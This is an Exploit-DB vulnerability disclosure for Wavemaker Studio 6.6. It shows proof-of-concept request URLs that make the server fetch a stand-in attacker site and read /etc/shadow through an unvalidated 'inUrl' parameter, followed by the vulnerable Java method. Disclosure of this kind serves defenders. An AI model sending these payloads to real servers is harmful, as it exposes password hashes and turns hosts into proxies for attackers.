EDB-ID: 45158 | Author: Gionathan Reale | Published: 2018-08-06 | CVE: N/A | Type: Webapps | Platform: Java | Vulnerable App: N/A | # Exploit Author: Gionathan "John" Reale
# Google Dork: N/A
# Date: 2018-08-01
# Vendor Homepage: http://www.wavemaker.com/
# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
# Affected Version: 6.6
# Tested on: Parrot OS
# CVE : N/A
# Description
# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an
# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
# can also be exploited to access sensitive data or to use the server hosting Wavemaker
# as a form of HTTP proxy among other things.
# Proof Of Concept
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow
# Vulnerable Code
# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java
# Line 419-430
@ExposeToClient
public String getContent(String inUrl) throws IOException {
try {
String str = getRemoteContent(inUrl);
str = str.replace("<head>", "<head><base href='" + inUrl
+ "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>");
return str;
} catch (Exception e) {
return "";
}
}